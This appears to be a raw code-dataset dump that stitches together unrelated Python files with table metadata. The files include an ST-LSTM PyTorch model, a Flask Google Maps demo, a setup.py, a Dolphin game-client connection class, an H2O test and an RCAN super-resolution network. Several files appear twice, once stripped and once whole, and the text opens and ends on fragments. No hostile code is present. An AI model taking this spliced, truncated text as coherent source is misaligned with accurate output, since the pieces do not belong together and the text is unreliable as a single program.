    # equivalent to the original join-then-search over all URLs.
    return any('private' in url for url in urls)
def get_gh_repo() -> str:
    """Return the 'owner/repo' slug parsed from the 'origin' remote URL.

    Raises:
        Exception: if the origin URL does not look like a GitHub remote.
    """
    remote_url = run_txtcapture(['git', 'remote', 'get-url', 'origin']).strip()
    # Matches both SSH ('github.com:owner/repo') and HTTPS
    # ('github.com/owner/repo') forms, with an optional '.git' suffix.
    # NOTE(review): the repo part only allows lowercase letters -- repo names
    # containing digits, dashes or dots would not match; confirm intended.
    re_repo = re.compile(r'github\.com[:\/]([a-z\d-]+\/[a-z]+)(\.git)?$')
    m = re_repo.search(remote_url)
    if not m:
        raise Exception(f"Could not find repo from {remote_url}")
    return m[1]
| 289 | 0 | 23 |
5e76824fe09b1da67ef92de0f20913bbf09df805 | 4,471 | py | Python | pioneer/core/STLSTM.py | TJUMMG/TGSR | 41a36c4fa1154bdc47bb48dbe97e8e8090294ce2 | [
"Apache-2.0"
] | null | null | null | pioneer/core/STLSTM.py | TJUMMG/TGSR | 41a36c4fa1154bdc47bb48dbe97e8e8090294ce2 | [
"Apache-2.0"
] | null | null | null | pioneer/core/STLSTM.py | TJUMMG/TGSR | 41a36c4fa1154bdc47bb48dbe97e8e8090294ce2 | [
"Apache-2.0"
] | 1 | 2022-02-24T23:40:44.000Z | 2022-02-24T23:40:44.000Z | import torch
import torch.nn as nn
if __name__ == '__main__':
    # Manual smoke test: run a random batch through a 2-layer STLSTM.
    batchsize =10
    # stlstm_cell = STLSTMCell(4, 10)
    # x = torch.randn([1, 4])
    # h = torch.randn([1, 10])
    # c = torch.randn([1, 10])
    # m = torch.randn([1, 10])
    #
    # h_t, c_t, m_t = stlstm_cell(x, h, c, m)
    stlstm = STLSTM(4, 10, 2, batchsize)
    # stlstm.cuda()
    # Input shape: [batch, seq_len, input_size].
    x = torch.randn([batchsize, 7, 4])
    a = stlstm(x)
    # NOTE(review): overwrites the forward output -- looks like a leftover
    # debugger breakpoint anchor.
    a =1
| 35.768 | 123 | 0.561619 | import torch
import torch.nn as nn
class STLSTMCell(nn.Module):
    """Single spatiotemporal LSTM cell.

    Alongside the usual hidden/cell state it updates a separate
    spatiotemporal memory stream; both memories are fused through an
    output gate to produce the next hidden state.
    """
    def __init__(self, input_size, hidden_size):
        super(STLSTMCell, self).__init__()
        # Projections for the input, hidden state and spatiotemporal memory.
        # Note: conv_x produces 7 chunks but only four of them (i, f, g, o)
        # are consumed in forward(); the three "prime" chunks are unused.
        self.conv_x = nn.Linear(input_size, hidden_size * 7)
        self.conv_h = nn.Linear(hidden_size, hidden_size * 4)
        self.conv_m = nn.Linear(hidden_size, hidden_size * 3)
        self.conv_o = nn.Linear(hidden_size * 2, hidden_size)
        self.conv_last = nn.Linear(hidden_size * 2, hidden_size)
        self.hidden_size = hidden_size
    def forward(self, input, hidden_state, cell_state, memory_state):
        """One cell step; input is [batch, input_size]."""
        gates_x = self.conv_x(input)
        gates_h = self.conv_h(hidden_state)
        gates_m = self.conv_m(memory_state)
        i_x, f_x, g_x, i_x_prime, f_x_prime, g_x_prime, o_x = torch.split(gates_x, self.hidden_size, dim=1)
        i_h, f_h, g_h, o_h = torch.split(gates_h, self.hidden_size, dim=1)
        i_m, f_m, g_m = torch.split(gates_m, self.hidden_size, dim=1)
        # Standard LSTM update for the temporal cell state.
        input_gate = torch.sigmoid(i_x + i_h)
        forget_gate = torch.sigmoid(f_x + f_h)
        candidate = torch.tanh(g_x + g_h)
        c_t = forget_gate * cell_state + input_gate * candidate
        # Parallel update for the spatiotemporal memory stream.
        input_gate_m = torch.sigmoid(i_x + i_m)
        forget_gate_m = torch.sigmoid(f_x + f_m)
        candidate_m = torch.tanh(g_x + g_m)
        m_t = forget_gate_m * memory_state + input_gate_m * candidate_m
        # The output gate reads both memories to produce the hidden state.
        fused = torch.cat((c_t, m_t), -1)
        output_gate = torch.sigmoid(o_x + o_h + self.conv_o(fused))
        h_t = output_gate * torch.tanh(self.conv_last(fused))
        return h_t, c_t, m_t
class STLSTM(nn.Module):
    """Stacked spatio-temporal LSTM.

    Layer 0 consumes the raw input; upper layers consume layer 0's latest
    hidden state.  Only two state tracks are kept (h0/c0 for layer 0, h1/c1
    shared by the upper layers), matching the 2-layer usage in the demo.
    The spatio-temporal memory `m` is threaded through every cell call.
    """
    def __init__(self,input_size, hidden_size, num_layer, batchsize):
        super(STLSTM, self).__init__()
        # Build the stacked cell layers.
        self.num_layer = num_layer
        cell_list=[]
        cell_list.append(STLSTMCell(input_size, hidden_size))
        for i in range(num_layer-1):
            cell_list.append(STLSTMCell(hidden_size,hidden_size))
        self.cell_list = nn.ModuleList(cell_list)
        # Zero initial states; note these are created for a fixed batchsize.
        self.hidden_state = torch.zeros(batchsize, hidden_size)
        self.cell_state = torch.zeros(batchsize, hidden_size)
        self.memory_state = torch.zeros(batchsize, hidden_size)
    def forward(self, inputs):
        """Run over `inputs` of shape (batch, seq_len, input_size); returns
        the final (h, c, m) of the top layer.
        """
        device = inputs.device
        self.hidden_state = self.hidden_state.to(device=device)
        self.cell_state = self.cell_state.to(device=device)
        self.memory_state = self.memory_state.to(device=device)
        # The original scheme assigned into self.hidden_state in a loop; that
        # worked for inference but broke training, so per-step results are
        # accumulated in Python lists instead.
        h0 = [self.hidden_state[:, :]]
        h1 = [self.hidden_state[:, :]]
        c0 = [self.cell_state[:, :]]
        c1 = [self.cell_state[:, :]]
        m = [self.memory_state]
        for seq in range(inputs.shape[1]):
            input = inputs[:, seq, :]
            # Per-step computation; input is (batch, input_size).
            for i in range(self.num_layer):
                if i == 0:
                    a,b,x = \
                        self.cell_list[i](input, h0[-1], c0[-1], m[-1])
                    h0.append(a), c0.append(b), m.append(x)
                else:
                    a,b,x = \
                        self.cell_list[i](h0[-1], h1[-1], c1[-1], m[-1])
                    h1.append(a), c1.append(b), m.append(x)
        return h1[-1], c1[-1], m[-1]
    def forward_(self, inputs):
        """Legacy in-place scheme (unused).

        NOTE(review): this indexes the 2-D state tensors with three indices
        (self.hidden_state[:, i, :]), which cannot work for the states
        created in __init__; kept only for reference.
        """
        # Original scheme.
        for seq in range(inputs.shape[1]):
            input = inputs[:, seq, :]
            # Per-step computation; input is (batch, input_size).
            for i in range(self.num_layer):
                if i == 0:
                    self.hidden_state[:, i, :], self.cell_state[:, i, :], self.memory_state = \
                        self.cell_list[i](input, self.hidden_state[:, i, :], self.cell_state[:, i, :],
                                          self.memory_state)
                else:
                    self.hidden_state[:, i, :], self.cell_state[:, i, :], self.memory_state = \
                        self.cell_list[i](self.hidden_state[:, i, :], self.hidden_state[:, i, :], self.cell_state[:, i, :],
                                          self.memory_state)
        return self.hidden_state, self.cell_state, self.memory_state
if __name__ == '__main__':
    # Smoke test: run a 2-layer ST-LSTM over a (batch=10, seq=7, feat=4)
    # random input; the commented lines exercise a single cell in isolation.
    batchsize =10
    # stlstm_cell = STLSTMCell(4, 10)
    # x = torch.randn([1, 4])
    # h = torch.randn([1, 10])
    # c = torch.randn([1, 10])
    # m = torch.randn([1, 10])
    #
    # h_t, c_t, m_t = stlstm_cell(x, h, c, m)
    stlstm = STLSTM(4, 10, 2, batchsize)
    # stlstm.cuda()
    x = torch.randn([batchsize, 7, 4])
    a = stlstm(x)
    a =1
| 3,943 | 10 | 179 |
d4ccb23fa768b7c5845523c071cba747ce1fbe83 | 678 | py | Python | examples/simple.py | fabricio-aguiar/Flask-GoogleMaps | 57fbad142723dcae512c41a3b8a4a3e34aaa2c40 | [
"MIT"
] | null | null | null | examples/simple.py | fabricio-aguiar/Flask-GoogleMaps | 57fbad142723dcae512c41a3b8a4a3e34aaa2c40 | [
"MIT"
] | null | null | null | examples/simple.py | fabricio-aguiar/Flask-GoogleMaps | 57fbad142723dcae512c41a3b8a4a3e34aaa2c40 | [
"MIT"
] | null | null | null | from flask import Flask, render_template
from flask_googlemaps import GoogleMaps, Map, icons
from dynaconf import FlaskDynaconf
app = Flask(__name__)
GoogleMaps(app)
FlaskDynaconf(app)
@app.route("/")
if __name__ == "__main__":
app.run(port=5050)
| 22.6 | 75 | 0.623894 | from flask import Flask, render_template
from flask_googlemaps import GoogleMaps, Map, icons
from dynaconf import FlaskDynaconf
app = Flask(__name__)
GoogleMaps(app)
FlaskDynaconf(app)
@app.route("/")
def map_created_in_view():
    """Render the demo page with a Google map constructed inside the view."""
    # Marker groups keyed by icon: green dots for plain points, a blue dot
    # carrying an info-window message.
    markers = {
        icons.dots.green: [(37.4419, -122.1419), (37.4500, -122.1350)],
        icons.dots.blue: [(37.4300, -122.1400, "Hello World")],
    }
    gmap = Map(
        identifier="gmap",
        varname="gmap",
        lat=37.4419,
        lng=-122.1419,
        markers=markers,
        style="height:400px;width:600px;margin:0;",
    )
    return render_template("simple.html", gmap=gmap)
# Development entry point only; use a proper WSGI server in production.
if __name__ == "__main__":
    app.run(port=5050)
| 400 | 0 | 22 |
e08fef1717dba2d5e1844755508084fbe4b923d4 | 2,301 | py | Python | setup.py | deepanshs/csdmpy | bd4e138b10694491113b10177a89305697f1752c | [
"BSD-3-Clause"
] | 7 | 2021-07-07T09:55:20.000Z | 2022-01-22T06:34:17.000Z | setup.py | deepanshs/csdmpy | bd4e138b10694491113b10177a89305697f1752c | [
"BSD-3-Clause"
] | 16 | 2021-06-09T06:28:27.000Z | 2022-03-01T18:12:33.000Z | setup.py | deepanshs/csdmpy | bd4e138b10694491113b10177a89305697f1752c | [
"BSD-3-Clause"
] | 1 | 2020-01-03T17:04:16.000Z | 2020-01-03T17:04:16.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from setuptools import find_packages
from setuptools import setup
# Load package veersion number.
with open("csdmpy/__init__.py", "r") as f:
for line in f.readlines():
if "__version__" in line:
before_keyword, keyword, after_keyword = line.partition("=")
version = after_keyword.strip()[1:-1]
# What packages are required for this module to be executed?
required = [
"numpy>=1.17",
"setuptools>=27.3",
"astropy>=3.0",
"requests>=2.21.0",
"numexpr>=2.7.0",
]
extras = {"matplotlib": ["matplotlib>=3.0"]}
setup_requires = ["setuptools>=27.3"]
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
try:
with open(os.path.join(here, "README.md"), encoding="utf-8") as f:
long_description = "\n" + f.read()
except FileNotFoundError:
long_description = ""
setup(
name="csdmpy",
version=version,
description="A python module for the core scientific dataset model.",
long_description=long_description,
long_description_content_type="text/markdown",
author="Deepansh Srivastava",
author_email="srivastava.89@osu.edu",
python_requires=">=3.6",
url="https://github.com/DeepanshS/csdmpy/",
packages=find_packages(),
install_requires=required,
setup_requires=setup_requires,
extras_require=extras,
tests_require=["pytest", "pytest-runner"],
include_package_data=True,
license="BSD-3-Clause",
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Scientific/Engineering",
],
)
| 31.958333 | 79 | 0.649718 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from setuptools import find_packages
from setuptools import setup
# Load the package version number from csdmpy/__init__.py without importing it.
with open("csdmpy/__init__.py", "r") as f:
    for line in f.readlines():
        if "__version__" in line:
            before_keyword, keyword, after_keyword = line.partition("=")
            # Strip the surrounding quote characters from the version literal.
            version = after_keyword.strip()[1:-1]
# What packages are required for this module to be executed?
required = [
    "numpy>=1.17",
    "setuptools>=27.3",
    "astropy>=3.0",
    "requests>=2.21.0",
    "numexpr>=2.7.0",
]
extras = {"matplotlib": ["matplotlib>=3.0"]}
setup_requires = ["setuptools>=27.3"]
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
try:
    with open(os.path.join(here, "README.md"), encoding="utf-8") as f:
        long_description = "\n" + f.read()
except FileNotFoundError:
    long_description = ""
setup(
    name="csdmpy",
    version=version,
    description="A python module for the core scientific dataset model.",
    long_description=long_description,
    long_description_content_type="text/markdown",
    author="Deepansh Srivastava",
    author_email="srivastava.89@osu.edu",
    python_requires=">=3.6",
    url="https://github.com/DeepanshS/csdmpy/",
    packages=find_packages(),
    install_requires=required,
    setup_requires=setup_requires,
    extras_require=extras,
    tests_require=["pytest", "pytest-runner"],
    include_package_data=True,
    license="BSD-3-Clause",
    classifiers=[
        # Trove classifiers
        # Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
        "Intended Audience :: Science/Research",
        "Intended Audience :: Developers",
        "Operating System :: OS Independent",
        "Development Status :: 4 - Beta",
        "License :: OSI Approved :: BSD License",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Topic :: Scientific/Engineering",
    ],
)
| 0 | 0 | 0 |
c6e923edfcd10936710abd0a96247f4a5614f3a0 | 65 | py | Python | alerter/src/message_broker/rabbitmq/__init__.py | SimplyVC/panic | 2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d | [
"Apache-2.0"
] | 41 | 2019-08-23T12:40:42.000Z | 2022-03-28T11:06:02.000Z | alerter/src/message_broker/rabbitmq/__init__.py | SimplyVC/panic | 2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d | [
"Apache-2.0"
] | 147 | 2019-08-30T22:09:48.000Z | 2022-03-30T08:46:26.000Z | alerter/src/message_broker/rabbitmq/__init__.py | SimplyVC/panic | 2f5c327ea0d14b6a49dc8f4599a255048bc2ff6d | [
"Apache-2.0"
] | 3 | 2019-09-03T21:12:28.000Z | 2021-08-18T14:27:56.000Z | from src.message_broker.rabbitmq.rabbitmq_api import RabbitMQApi
| 32.5 | 64 | 0.892308 | from src.message_broker.rabbitmq.rabbitmq_api import RabbitMQApi
| 0 | 0 | 0 |
36f8c1feebe983d31c6dc6408a16ba23e194cf98 | 643 | py | Python | datamanager/processing_gribnc_data/driver.py | mr-atharva-kulkarni/Algorithms-for-Sea-Route-Optimizaiton | 48d90ad2445b60d2228ed0aac60e1acba773b345 | [
"MIT"
] | null | null | null | datamanager/processing_gribnc_data/driver.py | mr-atharva-kulkarni/Algorithms-for-Sea-Route-Optimizaiton | 48d90ad2445b60d2228ed0aac60e1acba773b345 | [
"MIT"
] | null | null | null | datamanager/processing_gribnc_data/driver.py | mr-atharva-kulkarni/Algorithms-for-Sea-Route-Optimizaiton | 48d90ad2445b60d2228ed0aac60e1acba773b345 | [
"MIT"
] | null | null | null | import geojson
# Interactive driver: collect GRIB/NetCDF query parameters from stdin and
# fetch the corresponding GeoJSON from the local Flask service.
import requests
fileName = input("Enter Filename:")
parameterName = input("Enter Parameter Name:")
# Normalize to "Titlecase" form (e.g. "temperature" -> "Temperature").
parameterName = parameterName.lower().capitalize()
# NOTE(review): type-of-level and level are prompted for but never added to
# the request payload below -- confirm whether the server needs them.
typeOfLevelName = input("Enter type of level:")
levelName = input("Enter level:")
levelVal = int(levelName)
foreCastHourName = input("Enter forecast hour:")
forecastHour = int(foreCastHourName)
myjson = {
    "fileName":fileName,
    "parameterName":parameterName,
    "forecastHour":forecastHour
}
mygeojson = requests.post("http://127.0.0.1:5000/get-geo",json=myjson)
mygeojson = mygeojson.json()
# Persist the server's GeoJSON response to disk.
with open("grib2geo.json","w") as write_file:
    geojson.dump(mygeojson,write_file)
| 32.15 | 70 | 0.757387 | import geojson
import requests
fileName = input("Enter Filename:")
parameterName = input("Enter Parameter Name:")
parameterName = parameterName.lower().capitalize()
typeOfLevelName = input("Enter type of level:")
levelName = input("Enter level:")
levelVal = int(levelName)
foreCastHourName = input("Enter forecast hour:")
forecastHour = int(foreCastHourName)
myjson = {
"fileName":fileName,
"parameterName":parameterName,
"forecastHour":forecastHour
}
mygeojson = requests.post("http://127.0.0.1:5000/get-geo",json=myjson)
mygeojson = mygeojson.json()
with open("grib2geo.json","w") as write_file:
geojson.dump(mygeojson,write_file)
| 0 | 0 | 0 |
e688e699c0a8417169a2ba5399135c7797330ec6 | 3,180 | py | Python | Client/clientGameConnection.py | JarheadHME/Multiworld_Client | 7f264eb8631b9c1edd58bc31bb5bbbcfa3ec2314 | [
"MIT"
] | null | null | null | Client/clientGameConnection.py | JarheadHME/Multiworld_Client | 7f264eb8631b9c1edd58bc31bb5bbbcfa3ec2314 | [
"MIT"
] | null | null | null | Client/clientGameConnection.py | JarheadHME/Multiworld_Client | 7f264eb8631b9c1edd58bc31bb5bbbcfa3ec2314 | [
"MIT"
] | null | null | null | import asyncio
from asyncio import Task
from typing import List
from base_logger import logging
logger = logging.getLogger(__name__)
from Dolphin.dolphinGameHandler import DolphinGameHandler
from Model.itemDto import ItemDto
from util.abstractGameHandler import AbstractGameHandler
from PySide6.QtCore import Signal
| 37.857143 | 120 | 0.641509 | import asyncio
from asyncio import Task
from typing import List
from base_logger import logging
logger = logging.getLogger(__name__)
from Dolphin.dolphinGameHandler import DolphinGameHandler
from Model.itemDto import ItemDto
from util.abstractGameHandler import AbstractGameHandler
from PySide6.QtCore import Signal
class ClientGameConnection:
    """Bridges the multiworld client and the emulated game console.

    Polls the console for items the player picked up (queued for upload via
    get_item_to_send) and feeds items received from the server back into the
    game through the console handler.
    NOTE(review): the queues below are class-level lists, so every instance
    shares them; fine for a singleton client, hazardous otherwise.
    """
    _items_to_process: List[ItemDto] = list()
    _items_to_send: List[ItemDto] = list()
    # NOTE(review): never assigned per instance -- ItemDto in handle() is
    # always built with world id 0 (see the inline comment there).
    _world_id: int = 0
    _console_handler: AbstractGameHandler
    # Qt signal used to surface log lines in the GUI; assigned in connect().
    gui_logger_signal: Signal
    def __init__(self, world_id: int):
        self._console_handler = DolphinGameHandler(world_id)
    async def process_items(self) -> None:
        """Drain the incoming-item queue, giving each item to the game."""
        while len(self._items_to_process) > 0:
            item_dto = self._items_to_process[-1]
            await self.log(item_dto.get_simple_output())
            try:
                # If the console refused the item, back off and retry it.
                if not await self._console_handler.give_item(item_dto.itemId):
                    await asyncio.sleep(3)
                    continue
                self._items_to_process.pop()
                await asyncio.sleep(0)
            except RuntimeError as exc:
                logger.error(exc)
                del exc
    async def handle(self) -> None:
        """Main poll loop: collect queued pickups while the console is up."""
        await self.log("Connected To Console")
        while await self._console_handler.is_connected(): # Thread set interval instead of a while loop would be better
            try:
                state = await self._console_handler.get_queued_items()
                # state[1] values 0 and 0xFF act as "nothing queued" sentinels.
                if state[0] != 0 and state[1] != 0 and state[1] != 0xFF:
                    item_dto = ItemDto(self._world_id, 0, state[1]) # World ID should be set in client
                    await self.log(item_dto.get_simple_output())
                    self._items_to_send.append(item_dto)
                    await self._console_handler.clear_queued_items()
            except RuntimeError as rne:
                del rne
            finally:
                # Opportunistically flush any items waiting to enter the game.
                if len(self._items_to_process) > 0:
                    asyncio.create_task(self.process_items())
                await asyncio.sleep(0)
        await self.log("Disconnected from Console, attempting to reconnect.....")
    async def connect(self, gui_logger_signal: Signal) -> Task:
        """Block until the console is reachable, then start the handle() task."""
        self.gui_logger_signal = gui_logger_signal
        await self.log("Connecting to Console")
        while not await self._console_handler.is_connected():
            await self._console_handler.connect()
            if await self._console_handler.is_connected():
                break
            await asyncio.sleep(15)
            await self.log("Console was not found, trying again in 15 seconds.")
        return asyncio.create_task(self.handle())
    async def log(self, message: str) -> None:
        """Route a message to the GUI signal when present, else the logger."""
        if isinstance(self.gui_logger_signal, Signal):
            self.gui_logger_signal.emit(message)
        else:
            logger.info(message)
    def get_item_to_send(self) -> List[ItemDto]:
        # Items collected from the console, awaiting upload to the server.
        return self._items_to_send
    def remove_item_to_send(self, item_dto:ItemDto):
        # Called once the server has acknowledged the item.
        self._items_to_send.remove(item_dto)
    def push_item_to_process(self, item_dto: ItemDto) -> None:
        # Queue an item received from the server for injection into the game.
        self._items_to_process.append(item_dto)
| 2,429 | 408 | 23 |
5dce291b545fd45c8302c3044c37326984355ce7 | 982 | py | Python | h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2odownload_csv.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 6,098 | 2015-05-22T02:46:12.000Z | 2022-03-31T16:54:51.000Z | h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2odownload_csv.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 2,517 | 2015-05-23T02:10:54.000Z | 2022-03-30T17:03:39.000Z | h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2odownload_csv.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 2,199 | 2015-05-22T04:09:55.000Z | 2022-03-28T22:20:45.000Z | from __future__ import print_function
import sys, os
sys.path.insert(1,"../../../")
from tests import pyunit_utils
import h2o
def h2odownload_csv():
"""
Python API test: h2o.download_csv(data, filename)
"""
training_data = h2o.import_file(pyunit_utils.locate("smalldata/logreg/benign.csv"))
try:
results_dir = pyunit_utils.locate("results") # find directory path to results folder
filename = os.path.join(results_dir, "benign.csv")
h2o.download_csv(training_data, filename) # save csv
assert os.path.isfile(filename), "h2o.download_csv() command is not working."
except Exception as e:
if 'File not found' in e.args[0]:
print("Directory is not writable. h2o.download_csv() command is not tested.")
else:
assert False, "h2o.download_csvresult() command is not working."
if __name__ == "__main__":
pyunit_utils.standalone_test(h2odownload_csv)
else:
h2odownload_csv()
| 36.37037 | 95 | 0.680244 | from __future__ import print_function
import sys, os
sys.path.insert(1,"../../../")
from tests import pyunit_utils
import h2o
def h2odownload_csv():
    """
    Python API test: h2o.download_csv(data, filename)
    """
    frame = h2o.import_file(pyunit_utils.locate("smalldata/logreg/benign.csv"))
    try:
        # Export the frame into the writable results folder and verify the
        # file actually landed on disk.
        target = os.path.join(pyunit_utils.locate("results"), "benign.csv")
        h2o.download_csv(frame, target)
        assert os.path.isfile(target), "h2o.download_csv() command is not working."
    except Exception as e:
        if 'File not found' not in e.args[0]:
            assert False, "h2o.download_csvresult() command is not working."
        print("Directory is not writable. h2o.download_csv() command is not tested.")
# Entry-point wiring used by all H2O pyunit tests: standalone runs spin up
# their own cluster via standalone_test; suite runs call the test directly.
if __name__ == "__main__":
    pyunit_utils.standalone_test(h2odownload_csv)
else:
    h2odownload_csv()
| 0 | 0 | 0 |
501133344b118a98f39410df479eb520956042e0 | 5,952 | py | Python | codes/models/archs/RCAN_arch.py | AyeshaSadiqa/thesis | 761eb0c37acd42707d52d4a6bfabe8ac566d8aa4 | [
"Apache-2.0"
] | 77 | 2021-08-14T04:43:49.000Z | 2022-03-08T13:41:10.000Z | codes/models/archs/RCAN_arch.py | AyeshaSadiqa/thesis | 761eb0c37acd42707d52d4a6bfabe8ac566d8aa4 | [
"Apache-2.0"
] | 8 | 2021-10-30T14:52:11.000Z | 2022-03-09T12:44:54.000Z | codes/models/archs/RCAN_arch.py | AyeshaSadiqa/thesis | 761eb0c37acd42707d52d4a6bfabe8ac566d8aa4 | [
"Apache-2.0"
] | 7 | 2021-08-22T00:47:44.000Z | 2022-03-08T10:25:54.000Z | import math
import torch
from torch import nn as nn
from models.archs.arch_util import make_layer
class Upsample(nn.Sequential):
"""Upsample module.
Args:
scale (int): Scale factor. Supported scales: 2^n and 3.
num_feat (int): Channel number of intermediate features.
"""
class ChannelAttention(nn.Module):
"""Channel attention used in RCAN.
Args:
num_feat (int): Channel number of intermediate features.
squeeze_factor (int): Channel squeeze factor. Default: 16.
"""
class RCAB(nn.Module):
"""Residual Channel Attention Block (RCAB) used in RCAN.
Args:
num_feat (int): Channel number of intermediate features.
squeeze_factor (int): Channel squeeze factor. Default: 16.
res_scale (float): Scale the residual. Default: 1.
"""
class ResidualGroup(nn.Module):
"""Residual Group of RCAB.
Args:
num_feat (int): Channel number of intermediate features.
num_block (int): Block number in the body network.
squeeze_factor (int): Channel squeeze factor. Default: 16.
res_scale (float): Scale the residual. Default: 1.
"""
class RCAN(nn.Module):
"""Residual Channel Attention Networks.
Paper: Image Super-Resolution Using Very Deep Residual Channel Attention
Networks
Ref git repo: https://github.com/yulunzhang/RCAN.
Args:
num_in_ch (int): Channel number of inputs.
num_out_ch (int): Channel number of outputs.
num_feat (int): Channel number of intermediate features.
Default: 64.
num_group (int): Number of ResidualGroup. Default: 10.
num_block (int): Number of RCAB in ResidualGroup. Default: 16.
squeeze_factor (int): Channel squeeze factor. Default: 16.
upscale (int): Upsampling factor. Support 2^n and 3.
Default: 4.
res_scale (float): Used to scale the residual in residual block.
Default: 1.
img_range (float): Image range. Default: 255.
rgb_mean (tuple[float]): Image mean in RGB orders.
Default: (0.4488, 0.4371, 0.4040), calculated from DIV2K dataset.
"""
if __name__ == '__main__':
x = torch.randn(4, 3, 3, 64, 64)
model = RCAN(num_in_ch=3,
num_out_ch=3,
num_frames=3,
num_feat=64,
num_group=5,
num_block=2,
squeeze_factor=16,
upscale=1,
res_scale=1)
out = model(x)
print(out.shape)
| 33.251397 | 78 | 0.573589 | import math
import torch
from torch import nn as nn
from models.archs.arch_util import make_layer
class Upsample(nn.Sequential):
    """Pixel-shuffle upsampling head.

    Args:
        scale (int): Scale factor. Supported scales: 2^n and 3.
        num_feat (int): Channel number of intermediate features.
    """
    def __init__(self, scale, num_feat):
        layers = []
        if (scale & (scale - 1)) == 0:
            # Power of two: chain log2(scale) conv + PixelShuffle(2) stages.
            for _ in range(int(math.log(scale, 2))):
                layers += [nn.Conv2d(num_feat, 4 * num_feat, 3, 1, 1),
                           nn.PixelShuffle(2)]
        elif scale == 3:
            layers += [nn.Conv2d(num_feat, 9 * num_feat, 3, 1, 1),
                       nn.PixelShuffle(3)]
        else:
            raise ValueError(f'scale {scale} is not supported. '
                             'Supported scales: 2^n and 3.')
        super(Upsample, self).__init__(*layers)
class ChannelAttention(nn.Module):
    """Channel attention used in RCAN.

    Squeeze-and-excitation style gate: global average pool, two 1x1 convs
    with a channel bottleneck, sigmoid, then channel-wise rescaling.

    Args:
        num_feat (int): Channel number of intermediate features.
        squeeze_factor (int): Channel squeeze factor. Default: 16.
    """
    def __init__(self, num_feat, squeeze_factor=16):
        super(ChannelAttention, self).__init__()
        squeezed = num_feat // squeeze_factor
        self.attention = nn.Sequential(
            nn.AdaptiveAvgPool2d(1),
            nn.Conv2d(num_feat, squeezed, 1, padding=0),
            nn.ReLU(inplace=True),
            nn.Conv2d(squeezed, num_feat, 1, padding=0),
            nn.Sigmoid())
    def forward(self, x):
        # Per-channel gate in [0, 1], broadcast over the spatial dims.
        return x * self.attention(x)
class RCAB(nn.Module):
    """Residual Channel Attention Block (RCAB) used in RCAN.

    Conv-ReLU-Conv followed by channel attention, added back onto the input
    through an (optionally scaled) residual connection.

    Args:
        num_feat (int): Channel number of intermediate features.
        squeeze_factor (int): Channel squeeze factor. Default: 16.
        res_scale (float): Scale the residual. Default: 1.
    """
    def __init__(self, num_feat, squeeze_factor=16, res_scale=1):
        super(RCAB, self).__init__()
        self.res_scale = res_scale
        self.rcab = nn.Sequential(
            nn.Conv2d(num_feat, num_feat, 3, 1, 1),
            nn.ReLU(True),
            nn.Conv2d(num_feat, num_feat, 3, 1, 1),
            ChannelAttention(num_feat, squeeze_factor))
    def forward(self, x):
        # Identity shortcut plus the scaled attention branch.
        return x + self.rcab(x) * self.res_scale
class ResidualGroup(nn.Module):
    """Residual Group of RCAB.
    Args:
        num_feat (int): Channel number of intermediate features.
        num_block (int): Block number in the body network.
        squeeze_factor (int): Channel squeeze factor. Default: 16.
        res_scale (float): Scale the residual. Default: 1.
    """
    def __init__(self, num_feat, num_block, squeeze_factor=16, res_scale=1):
        super(ResidualGroup, self).__init__()
        # Stack of `num_block` RCABs built by the shared make_layer helper.
        self.residual_group = make_layer(
            RCAB,
            num_block,
            num_feat=num_feat,
            squeeze_factor=squeeze_factor,
            res_scale=res_scale)
        self.conv = nn.Conv2d(num_feat, num_feat, 3, 1, 1)
    def forward(self, x):
        # Trailing conv over the block stack, plus a long skip over the group.
        res = self.conv(self.residual_group(x))
        return res + x
class RCAN(nn.Module):
    """Residual Channel Attention Networks.
    Paper: Image Super-Resolution Using Very Deep Residual Channel Attention
    Networks
    Ref git repo: https://github.com/yulunzhang/RCAN.
    Args:
        num_in_ch (int): Channel number of inputs.
        num_out_ch (int): Channel number of outputs.
        num_frames (int): Frames per sample; 5-D inputs (B, N, C, H, W) are
            flattened to (B, N*C, H, W) before the first conv.
        num_feat (int): Channel number of intermediate features.
            Default: 64.
        num_group (int): Number of ResidualGroup. Default: 10.
        num_block (int): Number of RCAB in ResidualGroup. Default: 16.
        squeeze_factor (int): Channel squeeze factor. Default: 16.
        upscale (int): Upsampling factor. Support 2^n and 3.
            Default: 4.
        res_scale (float): Used to scale the residual in residual block.
            Default: 1.
        img_range (float): Image range. Default: 255.
        rgb_mean (tuple[float]): Image mean in RGB orders.
            Default: (0.4488, 0.4371, 0.4040), calculated from DIV2K dataset.
    """
    def __init__(self,
                 num_in_ch,
                 num_out_ch,
                 num_frames,
                 num_feat=64,
                 num_group=10,
                 num_block=16,
                 squeeze_factor=16,
                 upscale=4,
                 res_scale=1,
                 img_range=255.,
                 rgb_mean=(0.4488, 0.4371, 0.4040)):
        super(RCAN, self).__init__()
        # Mean/range normalization from the original RCAN is disabled below,
        # so img_range and rgb_mean are currently unused.
        # self.img_range = img_range
